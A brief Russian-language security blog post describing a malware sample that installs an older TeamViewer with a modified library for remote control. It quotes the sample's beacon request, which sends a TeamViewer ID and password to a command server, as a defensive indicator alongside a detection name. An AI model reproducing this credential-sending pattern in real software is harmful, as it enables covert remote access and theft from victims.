TeamViewer, как компонент бэкдора

15 января, 2011

Тут на днях коллегам из Group-IB попался интересный сэмпл, конечно он не просто так им попался и посредством него увели кругленькую сумму :) Собственно интересен он только тем, что дропер устанавливает в систему TeamViewer предыдущей версии с одной модифицированной библиотекой, через которую и происходит общение с админкой.

GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1

User-Agent: x3

Host: goeiuyi.net

Во всем остальном интересного там ничего нет и все более чем стандартно. Детектим мы его, как Win32/Sheldor.NAD ( VT).

Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.

Апр 2026

13:00

Регистрация открыта

Форум SocioTech 2026:
как «подружить» бизнес,
службу ИБ и персонал

Камерное пространство для честного и культурного диалога ИБ и бизнеса — без типовых докладов, рекламы и воды.

Кому будет полезно: владельцам бизнеса, руководителям ключевых процессов и директорам по ИБ.

«Куб», Москва Регистрация

Реклама. 16+ ООО «ФИШМАН», ИНН 9715266823